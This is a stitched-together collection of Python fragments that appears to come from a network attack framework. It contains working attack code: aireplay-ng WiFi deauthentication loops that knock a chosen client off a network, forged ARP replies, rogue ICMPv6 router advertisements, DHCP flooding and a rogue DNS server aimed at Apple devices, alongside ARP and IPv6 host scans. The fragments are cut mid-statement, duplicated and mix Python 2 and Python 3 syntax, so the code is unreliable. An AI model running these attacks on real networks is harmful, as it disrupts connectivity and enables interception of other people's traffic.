def deauth_packets_send(network_interface: str = 'eth0',
network_channel: str = '1',
network_bssid: str = '12:34:56:78:90:ab',
mac_address: str = '12:34:56:78:90:ac',
number_of_deauth: int = 5):
global aireply_stop
# Start target requests sniffer function
threat_manager = ThreadManager(2)
threat_manager.add_task(requests_sniffer, mac_address)
# Set WiFi channel on interface for send WiFi deauth packets
sub.Popen(
['iwconfig ' + network_interface + ' channel ' + network_channel],
shell=True)
# Start deauth packets numbers
deauth_packets_number = number_of_deauth
aireply_stop = False
while deauth_packets_number < 50:
# Check global variable aireplay_stop
if aireply_stop:
base.print_info('Stop aireplay-ng ...')
break
# Start aireplay-ng process
try:
base.print_info('Send WiFi deauth packets in aireplay-ng ...')
aireplay_process = sub.Popen([
'aireplay-ng ' + network_interface + ' -0 ' +
str(deauth_packets_number) + ' -a ' + network_bssid + ' -c ' +
mac_address
],
shell=True,
stdout=sub.PIPE)
while True:
output = aireplay_process.stdout.readline().decode()
if output == '' and aireplay_process.poll() is not None:
break
if output:
stdout.write(
re.sub(r'(\d\d:\d\d:\d\d (Waiting|Sending))',
base.c_info + r'\g<1>', output))
except OSError:
base.print_error('Something else went wrong while trying to run ',
'`aireply-ng`')
exit(2)
# Wait before sniff request packet from target
base.print_info('Wait 10 sec. before sniff packets from target: ' +
mac_address)
sleep(10)
# Add 5 packets to number of WiFi deauth packets
deauth_packets_number += 5
def deauth_packets_send():
# Start DHCP or ARP requests sniffer function
tm = ThreadManager(2)
tm.add_task(dhcp_request_sniffer)
sleep(3)
# Set WiFi channel on interface for send WiFi deauth packets
sub.Popen(['iwconfig ' + deauth_network_interface + ' channel ' + channel],
shell=True)
Base.print_info("Send WiFi deauth packets ...")
# Start deauth packets numbers = 3
deauth_packets_number = 3
while not sniff_dhcp_request:
# Start aireplay-ng process
try:
aireplay_process = sub.Popen([
'aireplay-ng ' + deauth_network_interface + ' -0 ' +
str(deauth_packets_number) + ' -a ' + bssid + ' -c ' +
target_mac_address
],
shell=True,
stdout=sub.PIPE)
while True:
output = aireplay_process.stdout.readline()
if output == '' and aireplay_process.poll() is not None:
break
if output:
stdout.write(
re.sub(r'(\d\d:\d\d:\d\d (Waiting|Sending))',
Base.c_info + r'\g<1>', output))
except OSError as e:
if e.errno == errno.ENOENT:
Base.print_error("Program: ", "aireply-ng",
" is not installed!")
exit(1)
else:
Base.print_error(
"Something else went wrong while trying to run ",
"`aireply-ng`")
exit(2)
# Wait before sniff ARP or DHCP request packet
sleep(5)
# Add 5 packets to number of WiFi deauth packets
if deauth_packets_number < 30:
deauth_packets_number += 5
def search_router(
self,
network_interface: str = 'eth0',
timeout: int = 3,
retry: int = 3,
exit_on_failure: bool = True) -> Dict[str, Union[int, str]]:
"""
Search IPv6 router in network
:param network_interface: Network interface name (example: 'eth0')
:param timeout: Timeout in seconds (default: 3)
:param retry: Retry number (default: 3)
:param exit_on_failure: Exit if IPv6 router in network not found (default: True)
:return: IPv6 router information dictionary (example: {'router_mac_address': '01:23:45:67:89:0a', 'router_ipv6_address': 'fe80::1234:5678:90ab:cdef', 'flags': '0x0', 'router-lifetime': 0, 'reachable-time': 0, 'retrans-timer': 0, 'prefix': 'fd00::/64', 'vendor': 'D-Link International'})
"""
# region Clear lists with scan results
self.results.clear()
self.unique_results.clear()
self.mac_addresses.clear()
# endregion
# region Set variables
self.router_search = True
self.network_interface = network_interface
self.timeout = int(timeout)
self.retry_number = int(retry)
# endregion
# region Run _sniffer
tm = ThreadManager(2)
tm.add_task(self._sniff)
# endregion
# region Run _sender
self._send()
# endregion
# region Wait
sleep(self.timeout)
# endregion
# region Return IPv6 router information
if len(self.router_info.keys()) == 0:
if exit_on_failure:
self.base.error_text(
'Could not found IPv6 Router on interface: ' +
self.network_interface)
exit(1)
return self.router_info
def get_mac_address(self,
network_interface,
target_ip_address,
timeout=5,
retry=5,
exit_on_failure=True):
try:
# region Set variables
self.target_ip_address = target_ip_address
self.network_interface = network_interface
self.timeout = int(timeout)
self.retry_number = int(retry)
# endregion
# region Run sniffer
tm = ThreadManager(2)
tm.add_task(self.sniff)
# endregion
# region Run sender
self.send()
# endregion
# region Wait
sleep(self.timeout)
# endregion
# region Return
if 'mac-address' in self.results[0].keys():
return self.results[0]['mac-address']
else:
return "ff:ff:ff:ff:ff:ff"
# endregion
except IndexError:
if exit_on_failure:
self.base.print_error(
"Could not find MAC address of IP address: ",
target_ip_address)
exit(1)
else:
return "ff:ff:ff:ff:ff:ff"
except KeyboardInterrupt:
self.base.print_info("Exit")
exit(0)
def search_router(self, network_interface, timeout=3, retry=3):
# region Set variables
self.router_search = True
self.network_interface = network_interface
self.timeout = int(timeout)
self.retry_number = int(retry)
# endregion
# region Run sniffer
tm = ThreadManager(2)
tm.add_task(self.sniff)
# endregion
# region Run sender
self.send()
# endregion
# region Wait
sleep(self.timeout)
# endregion
# region Return results
return self.router_info
def deauth_packets_send(network_interface, network_channel, network_bssid,
mac_address, number_of_deauth):
global aireply_stop
# Start target requests sniffer function
tm = ThreadManager(2)
tm.add_task(requests_sniffer, mac_address)
# Set WiFi channel on interface for send WiFi deauth packets
sub.Popen(
['iwconfig ' + network_interface + ' channel ' + network_channel],
shell=True)
# Start deauth packets numbers
deauth_packets_number = number_of_deauth
aireply_stop = False
while deauth_packets_number < 50:
# Check global variable aireplay_stop
if aireply_stop:
Base.print_info("Stop aireplay-ng ...")
break
# Start aireplay-ng process
try:
Base.print_info("Send WiFi deauth packets in aireplay-ng ...")
aireplay_process = sub.Popen([
'aireplay-ng ' + network_interface + ' -0 ' +
str(deauth_packets_number) + ' -a ' + network_bssid + ' -c ' +
mac_address
],
shell=True,
stdout=sub.PIPE)
while True:
output = aireplay_process.stdout.readline()
if output == '' and aireplay_process.poll() is not None:
break
if output:
stdout.write(
re.sub(r'(\d\d:\d\d:\d\d (Waiting|Sending))',
Base.c_info + r'\g<1>', output))
except OSError as e:
if e.errno == errno.ENOENT:
Base.print_error("Program: ", "aireply-ng",
" is not installed!")
exit(1)
else:
Base.print_error(
"Something else went wrong while trying to run ",
"`aireply-ng`")
exit(2)
# Wait before sniff request packet from target
Base.print_info("Wait 10 sec. before sniff packets from target: " +
mac_address)
sleep(10)
# Add 5 packets to number of WiFi deauth packets
deauth_packets_number += 5
if target_apple_device is not None:
if len(target_apple_device) == 3:
target_ip_address = target_apple_device[0]
target_mac_address = target_apple_device[1]
else:
Base.print_error("Bad value in target Apple device!")
exit(1)
else:
Base.print_error("Target Apple device not found!")
exit(1)
# endregion
# region Run DNS server
Base.print_info("Start DNS server ...")
TM.add_task(start_dns_server, listen_network_interface, target_mac_address,
technique_index, your_ip_address, se_domain)
# endregion
# region Get network interface gateway IPv6 address
if technique_index in [5, 6]:
Base.print_info("Search IPv6 Gateway and DNS server ...")
router_advertisement_data = ICMPv6Scan.search_router(
listen_network_interface, 5, 3)
if router_advertisement_data is not None:
gateway_ipv6_address = router_advertisement_data[
'router_ipv6_address']
if 'dns-server' in router_advertisement_data.keys():
dns_ipv6_address = router_advertisement_data['dns-server']
if target['mac_address'] is not None:
base.print_info('Target MAC: ', target['mac_address'])
if target['ipv6_address'] is not None:
base.print_info('Target Global IPv6: ', target['ipv6_address'])
else:
base.print_info('First suffix offer IP: ', str(first_suffix))
base.print_info('Last suffix offer IP: ', str(last_suffix))
base.print_info('Prefix: ', network_prefix)
base.print_info('Router IPv6 address: ', your_local_ipv6_address)
base.print_info('DNS IPv6 address: ', recursive_dns_address)
base.print_info('Domain search: ', dns_search)
# endregion
# region Send ICMPv6 advertise packets in other thread
tm.add_task(send_icmpv6_advertise_packets)
# endregion
# region Add multicast MAC addresses on interface
try:
base.print_info('Get milticast MAC address on interface: ',
current_network_interface)
mcast_addresses = sub.Popen(
['ip maddress show ' + current_network_interface],
shell=True,
stdout=sub.PIPE)
out, err = mcast_addresses.communicate()
if icmpv6_router_solicitation_address not in str(out):
icmpv6_mcast_address = sub.Popen([
'ip maddress add ' + icmpv6_router_solicitation_address +
def resolve(
self,
ns_servers, # type: List[Dict[str, str]]
domain, # type: str
subdomains_list=[], # type: List[str]
subdomains_file=None, # type: str
subdomains_brute=False, # type: bool
max_threats_count=10, # type: int
udp_destination_port=53, # type: int
timeout=30 # type: int
):
# type: (...) -> List[Dict[str, str]]
"""
DNS resolve all subdomains in target domain
:param ns_servers: List of DNS servers (example: [{'ipv4 address': '8.8.8.8', 'mac address': '01:23:45:67:89:0a'}])
:param domain: Target domain (example: 'test.com')
:param subdomains_list: List of subdomains (example: ['www','ns','mail'])
:param subdomains_file: Name of file with subdomains (default: None)
:param subdomains_brute: Brute mode on (auto make list with subdomains) if True, Brute mode off if False (default: False)
:param max_threats_count: Maximum threats count (default: 10)
:param udp_destination_port: UDP destination port (default: 53)
:param timeout: Connection after send all DNS queries (default: 30)
:return: List of dictionary (example: [{'Domain': 'www.test.com', 'IPv4 address': '1.2.3.4', 'IPv6 address': '-'}])
"""
try:
# region Set target domain
assert not (domain is None or domain == ''), \
'Target domain is empty, please set target domain in this parameter: ' + self.base.info_text('domain')
self.domain = domain
# endregion
# region Subdomains list
if len(subdomains_list) > 0:
self.subdomains = subdomains_list
# endregion
# region Subdomains file
if subdomains_file is not None:
assert isfile(subdomains_file), \
'File with subdomain list:' + self.base.error_text(subdomains_file) + ' not found!'
with open(subdomains_file) as subdomains_file_descriptor:
for subdomain in subdomains_file_descriptor.read(
).splitlines():
self.subdomains.append(subdomain)
# endregion
# region Subdomains brute
if subdomains_brute:
if not self.quiet:
self.base.print_info(
'Make subdomains list for brute .... ')
for character1 in self.available_characters:
self.subdomains.append(character1)
for character2 in self.available_characters:
self.subdomains.append(character1 + character2)
for character3 in self.available_characters:
self.subdomains.append(character1 + character2 +
character3)
# endregion
# region Check length of subdomains list
assert len(self.subdomains) != 0, \
'List containing subdomains is empty, please set any of this parameters: ' \
+ self.base.info_text('subdomain_list') + ' or ' \
+ self.base.info_text('subdomain_file') + ' or ' \
+ self.base.info_text('subdomain_brute')
# endregion
# region Create raw socket
raw_socket = socket(AF_PACKET, SOCK_RAW)
raw_socket.bind((self.network_interface, 0))
# endregion
# region Sniff DNS answers
if not self.quiet:
self.base.print_info('Start DNS answers sniffer ...')
threats = ThreadManager(max_threats_count)
threats.add_task(self._sniff_packets, self.your_mac_address,
self.your_ipv4_address, self.your_ipv6_address,
udp_destination_port)
# endregion
# region Send DNS queries
if not self.quiet:
self.base.print_info('Start sending DNS queries, time: ',
str(datetime.now()))
self._send_queries(send_socket=raw_socket,
source_mac_address=self.your_mac_address,
source_ipv4_address=self.your_ipv4_address,
source_ipv6_address=self.your_ipv6_address,
domain=domain,
ns_servers=ns_servers,
destination_port=udp_destination_port,
max_threats_count=int(max_threats_count) - 1,
subdomains=self.subdomains)
# endregion
# region Timeout
if not self.quiet:
self.base.print_info('Wait timeout: ', str(timeout) + ' sec')
sleep(timeout)
# endregion
# region Return results
return self.results
# endregion
except AssertionError as Error:
self.base.print_error(Error.args[0])
exit(1)
def _send_queries(
self,
send_socket, # type: socket
source_mac_address, # type: str
source_ipv4_address, # type: str
source_ipv6_address, # type: str
domain, # type: str
ns_servers, # type: List[Dict[str, str]]
destination_port=53, # type: int
max_threats_count=9, # type: int
subdomains=['www'], # type: List[str]
queries_type=[1, 28], # type: List[int]
queries_class=[1] # type: List[int]
):
# type: (...) -> None
"""
Send DNS queries to IPv4/IPv6 DNS servers
:param send_socket: Raw socket for sending DNS queries
:param source_mac_address: Source MAC address for DNS query (most likely this is MAC address on your network interface)
:param source_ipv4_address: Source IPv4 address for DNS query (most likely this is IPv4 address on your network interface)
:param source_ipv6_address: Source IPv6 address for DNS query (most likely this is IPv6 address on your network interface)
:param domain: Target domain (example: 'test.com')
:param ns_servers: List of DNS servers (example: [{'ipv4 address': '8.8.8.8', 'mac address': '01:23:45:67:89:0a'}])
:param destination_port: UDP destination port (default: 53)
:param max_threats_count: Maximum threats count (default: 9)
:param subdomains: List of subdomains (default: ['www'])
:param queries_type: List of queries type (default: [1, 28]; type 1: A, type 28: AAAA)
:param queries_class: List of queries class (default: [1]; class 1: IN)
:return: None
"""
# DNS query type: 1 (A)
# DNS query type: 28 (AAAA)
# DNS query class: 1 (IN)
# region Init threat manager
send_threats = ThreadManager(max_threats_count)
# endregion
# region Make DNS queries list
queries = list()
for subdomain in subdomains:
for query_type in queries_type:
for query_class in queries_class:
queries.append({
'type': query_type,
'class': query_class,
'name': subdomain + '.' + domain
})
# endregion
# region Calculate number of DNS queries for one threat
queries_len = len(queries)
ipv4_ns_servers_len = 0
ipv6_ns_servers_len = 0
for ns_server in ns_servers:
if 'ipv4 address' in ns_server.keys():
ipv4_ns_servers_len += 1
if 'ipv6 address' in ns_server.keys():
ipv6_ns_servers_len += 1
if source_ipv6_address is not None:
queries_len_for_threat = int(
(queries_len * (ipv4_ns_servers_len + ipv6_ns_servers_len)) /
max_threats_count) + 1
else:
queries_len_for_threat = int(
(queries_len * ipv4_ns_servers_len) / max_threats_count) + 1
# endregion
# region Send DNS queries
# region Send DNS queries to IPv4 NS servers
for ns_server in ns_servers:
if 'ipv4 address' in ns_server.keys():
for query_index in range(0, queries_len,
queries_len_for_threat):
send_threats.add_task(
self._send_ipv4_queries, source_mac_address,
source_ipv4_address, ns_server['mac address'],
ns_server['ipv4 address'], destination_port,
queries[query_index:query_index +
queries_len_for_threat], send_socket)
# endregion
# region Send DNS queries to IPv6 NS servers
if source_ipv6_address is not None:
for ns_server in ns_servers:
if 'ipv6 address' in ns_server.keys():
for query_index in range(0, queries_len,
queries_len_for_threat):
send_threats.add_task(
self._send_ipv6_queries, source_mac_address,
source_ipv6_address, ns_server['mac address'],
ns_server['ipv6 address'], destination_port,
queries[query_index:query_index +
queries_len_for_threat], send_socket)
# endregion
# endregion
# region Wait all threats
send_threats.wait_for_completion()
def get_mac_address(self,
network_interface: str = 'eth0',
target_ip_address: str = '192.168.0.1',
timeout: int = 5,
retry: int = 5,
exit_on_failure: bool = True,
show_scan_percentage: bool = True) -> str:
"""
Get MAC address of IP address on network interface
:param network_interface: Network interface name (example: 'eth0')
:param timeout: Timeout in seconds (default: 3)
:param retry: Retry number (default: 3)
:param target_ip_address: Target IPv4 address (example: 192.168.0.1)
:param exit_on_failure: Exit if MAC address of target IP address not found (default: True)
:param show_scan_percentage: Show ARP scan progress percentage (default: True)
:return: MAC address of target IP address (example: '01:23:45:67:89:0a')
"""
# region Set result MAC address value
result_mac_address = 'ff:ff:ff:ff:ff:ff'
# endregion
try:
# region Clear lists with scan results
self.results.clear()
self.unique_results.clear()
self.mac_addresses.clear()
# endregion
# region Set variables
self.quit = not show_scan_percentage
self.target_ip_address = target_ip_address
self.network_interface = network_interface
self.timeout = int(timeout)
self.retry_number = int(retry)
# endregion
# region Run _sniffer
tm = ThreadManager(2)
tm.add_task(self._sniff)
# endregion
# region Run sender
self._send()
# endregion
# region Wait
sleep(self.timeout)
# endregion
# region Return
if 'mac-address' in self.results[0].keys():
result_mac_address = self.results[0]['mac-address']
# endregion
except IndexError:
pass
except KeyboardInterrupt:
self.base.print_info('Exit')
exit(0)
if result_mac_address == 'ff:ff:ff:ff:ff:ff':
if exit_on_failure:
self.base.print_error(
'Could not find MAC address of IP address: ',
target_ip_address)
exit(1)
return result_mac_address
def scan(self,
network_interface: str = 'eth0',
timeout: int = 3,
retry: int = 3,
target_ip_address: Union[None, str] = None,
check_vendor: bool = True,
exclude_ip_addresses: Union[None, List[str]] = None,
exit_on_failure: bool = True,
show_scan_percentage: bool = True) -> List[Dict[str, str]]:
"""
ARP scan on network interface
:param network_interface: Network interface name (example: 'eth0')
:param timeout: Timeout in seconds (default: 3)
:param retry: Retry number (default: 3)
:param target_ip_address: Target IPv4 address (example: 192.168.0.1)
:param check_vendor: Check vendor of hosts (default: True)
:param exclude_ip_addresses: Exclude IPv4 address list (example: ['192.168.0.1','192.168.0.2'])
:param exit_on_failure: Exit if alive hosts in network not found (default: True)
:param show_scan_percentage: Show ARP scan progress percentage (default: True)
:return: Result list of alive hosts (example: [{'mac-address': '01:23:45:67:89:0a', 'ip-address': '192.168.0.1'}])
"""
try:
# region Clear lists with scan results
self.results.clear()
self.unique_results.clear()
self.mac_addresses.clear()
# endregion
# region Set variables
self.quit = not show_scan_percentage
self.target_ip_address = target_ip_address
self.network_interface = network_interface
self.timeout = int(timeout)
self.retry_number = int(retry)
# endregion
# region Run _sniffer
tm = ThreadManager(2)
tm.add_task(self._sniff)
# endregion
# region Run sender
self._send()
# endregion
# region Wait
sleep(self.timeout)
# endregion
# region Unique results
for index in range(len(self.results)):
if self.results[index][
'mac-address'] not in self.mac_addresses:
self.unique_results.append(self.results[index])
self.mac_addresses.append(
self.results[index]['mac-address'])
# endregion
# region Exclude IP addresses
if exclude_ip_addresses is not None:
self.results = self.unique_results
self.unique_results = list()
for index in range(len(self.results)):
if self.results[index][
'ip-address'] not in exclude_ip_addresses:
self.unique_results.append(self.results[index])
self.results = list()
# endregion
# region Get vendors
if check_vendor:
for result_index in range(len(self.unique_results)):
self.unique_results[result_index]['vendor'] = \
self.base.get_vendor_by_mac_address(self.unique_results[result_index]['mac-address'])
# endregion
except KeyboardInterrupt:
self.base.print_info('Exit')
exit(0)
if len(self.unique_results) == 0:
if exit_on_failure:
self.base.print_error(
'Could not find allive hosts on interface: ',
self.network_interface)
exit(1)
return self.unique_results
if args.src_port is None:
src_port = randint(1024, 65535)
else:
src_port = args.src_port
dst_ip_address = args.target_ip
if args.target_mac is None:
dst_mac_address = Base.get_mac(current_network_interface, dst_ip_address)
dst_port = args.target_port
data = args.data
print Base.c_info + "Interface: " + current_network_interface
print Base.c_info + "Src MAC: " + src_mac_address
print Base.c_info + "Src IP: " + src_ip_address
print Base.c_info + "Src PORT: " + str(src_port)
print Base.c_info + "Dst MAC: " + dst_mac_address
print Base.c_info + "Dst IP: " + dst_ip_address
print Base.c_info + "Dst PORT: " + str(dst_port)
tm.add_task(sender)
print Base.c_info + "Waiting for TCP connection from " + dst_ip_address + " or ARP ... "
sniff(filter="(tcp and src host " + dst_ip_address + " and src port " + str(dst_port) +
" and dst host " + src_ip_address + " and dst port " + str(src_port) + ") or arp",
prn=get_syn_and_ack_numbers, iface=current_network_interface)
def scan(self, network_interface, timeout=3, retry=3, target_ip_address=None, check_vendor=True,
exclude_ip_address=None):
# region Set variables
self.target_ip_address = target_ip_address
self.network_interface = network_interface
self.timeout = int(timeout)
self.retry_number = int(retry)
# endregion
# region Run sniffer
tm = ThreadManager(2)
tm.add_task(self.sniff)
# endregion
# region Run sender
self.send()
# endregion
# region Create vendor list
if check_vendor:
self.vendor_list = self.base.get_mac_prefixes()
# endregion
# region Wait
sleep(self.timeout)
# endregion
# region Unique results
for index in range(len(self.results)):
if self.results[index]['mac-address'] not in self.mac_addresses:
self.unique_results.append(self.results[index])
self.mac_addresses.append(self.results[index]['mac-address'])
# endregion
# region Reset results and mac addresses list
self.results = []
self.mac_addresses = []
# endregion
# region Exclude IP address
if exclude_ip_address is not None:
self.results = self.unique_results
self.unique_results = []
for index in range(len(self.results)):
if self.results[index]['ip-address'] != exclude_ip_address:
self.unique_results.append(self.results[index])
self.results = []
# endregion
# region Get vendors
for result_index in range(len(self.unique_results)):
# Get current MAC address prefix
current_mac_prefix = self.eth.get_mac_prefix(self.unique_results[result_index]['mac-address'])
# Search this prefix in vendor list
for vendor_index in range(len(self.vendor_list)):
if current_mac_prefix == self.vendor_list[vendor_index]['prefix']:
self.unique_results[result_index]['vendor'] = self.vendor_list[vendor_index]['vendor']
break
# Could not find this prefix in vendor list
if 'vendor' not in self.unique_results[result_index].keys():
self.unique_results[result_index]['vendor'] = "Unknown vendor"
# endregion
# region Return results
return self.unique_results
base.print_info('Find Apple devices in local network with ARP scan ...')
apple_devices: List[List[str]] = scanner.find_apple_devices_by_mac(listen_network_interface)
else:
base.print_info('Find Apple devices in local network with nmap scan ...')
apple_devices: List[List[str]] = scanner.find_apple_devices_with_nmap(listen_network_interface)
apple_device = scanner.apple_device_selection(apple_devices=apple_devices, exit_on_failure=True)
# endregion
# region Print target IP and MAC address
if not args.quit:
base.print_info('Target: ', apple_device[0] + ' (' + apple_device[1] + ')')
# endregion
# region Start _sniffer
tm = ThreadManager(2)
tm.add_task(_sniffer)
# endregion
# region Send first Multicast ARP request packets
sleep(3)
if not args.quit:
base.print_warning('Send initial Multicast ARP requests')
_send_arp_requests(source_mac_address=your_mac_address, send_socket=raw_socket,
random_ip_address=base.get_random_ip_on_interface(listen_network_interface),
count_of_packets=5)
# endregion
# region Wait for completion
tm.wait_for_completion()
# endregion
def scan(self,
network_interface: str = 'eth0',
timeout: int = 3,
retry: int = 3,
target_mac_address: Union[None, str] = None,
check_vendor: bool = True,
exit_on_failure: bool = True) -> List[Dict[str, str]]:
"""
Find alive IPv6 hosts in local network with echo (ping) request packets
:param network_interface: Network interface name (example: 'eth0')
:param timeout: Timeout in seconds (default: 3)
:param retry: Retry number (default: 3)
:param target_mac_address: Target MAC address (example: 192.168.0.1)
:param check_vendor: Check vendor of hosts (default: True)
:param exit_on_failure: Exit if alive IPv6 hosts in network not found (default: True)
:return: List of alive hosts in network (example: [{'mac-address': '01:23:45:67:89:0a', 'ip-address': 'fe80::1234:5678:90ab:cdef', 'vendor': 'Apple, Inc.'}])
"""
# region Clear lists with scan results
self.results.clear()
self.unique_results.clear()
self.mac_addresses.clear()
# endregion
# region Set variables
if target_mac_address is not None:
self.base.mac_address_validation(mac_address=target_mac_address,
exit_on_failure=True)
self.target_mac_address = target_mac_address
self.network_interface = network_interface
self.timeout = int(timeout)
self.retry_number = int(retry)
self.icmpv6_identifier = randint(1, 65535)
# endregion
# region Run _sniffer
tm = ThreadManager(2)
tm.add_task(self._sniff)
# endregion
# region Run _sender
self._send()
# endregion
# region Wait
sleep(self.timeout)
# endregion
# region Unique results
for index in range(len(self.results)):
if self.results[index]['mac-address'] not in self.mac_addresses:
self.unique_results.append(self.results[index])
self.mac_addresses.append(self.results[index]['mac-address'])
# endregion
# region Get vendors
if check_vendor:
for result_index in range(len(self.unique_results)):
self.unique_results[result_index]['vendor'] = \
self.base.get_vendor_by_mac_address(self.unique_results[result_index]['mac-address'])
# endregion
# region Return results
if len(self.unique_results) == 0:
if exit_on_failure:
self.base.error_text(
'Could not found alive IPv6 hosts on interface: ' +
self.network_interface)
exit(1)
return self.unique_results
Base.print_info("Received a new IP address: ",
current_ip_address)
# endregion
# region Rewrite old mac and ip addresses
old_mac_address = current_mac_address
old_ip_address = current_ip_address
# endregion
sleep(int(args.delay))
# endregion
else:
# region Start DHCP sender in other thread
tm = ThreadManager(2)
tm.add_task(send_dhcp_discover)
# endregion
# region Set network filter
network_filters = {}
network_filters['IP'] = {'destination-ip': your_ip_address}
network_filters['UDP'] = {'source-port': 67}
network_filters['UDP'] = {'destination-port': 67}
# endregion
# region Start sniffer
sniff = Sniff_raw()
sniff.start(protocols=['IP', 'UDP', 'DHCP'],
prn=send_dhcp_request,
filters=network_filters)
# endregion
target_ip=_target_ip_address)
if args.broadcast:
destination_mac_address = "ff:ff:ff:ff:ff:ff"
else:
destination_mac_address = "33:33:00:00:00:01"
_arp_request = _arp.make_request(ethernet_src_mac=_current_mac_address,
ethernet_dst_mac=destination_mac_address,
sender_mac=_current_mac_address,
sender_ip=_target_ip_address,
target_mac="00:00:00:00:00:00",
target_ip=Base.get_netiface_random_ip(_current_network_interface))
# endregion
# region Start ARP sniffer
TM.add_task(arp_sniffer)
# endregion
# region Send only ARP reply packets
if args.replies:
Base.print_info("Send only ARP reply packets to: ",
str(_target_ip_address) + " (" + str(_target_mac_address) + ")")
for _ in range(_number_of_packets):
_sock.send(_arp_response)
sleep(0.5)
_sock.close()
# endregion
# region Send only ARP request packets
elif args.requests:
Base.print_error(
"Could not find device MAC address with IP address: ",
target_ip)
exit(1)
else:
apple_device = [target_ip, target_mac]
# endregion
# region Print target IP and MAC address
Base.print_info("Target: ",
apple_device[0] + " (" + apple_device[1] + ")")
# endregion
# region Start sniffer
tm = ThreadManager(2)
tm.add_task(sniffer)
# endregion
# region Send first Multicast ARP request
sleep(3)
Base.print_warning("Send initial Multicast ARP requests")
send_arp_request()
# endregion
# region Wait for completion
tm.wait_for_completion()
# endregion
except KeyboardInterrupt:
Base.print_info("Exit")
exit(0)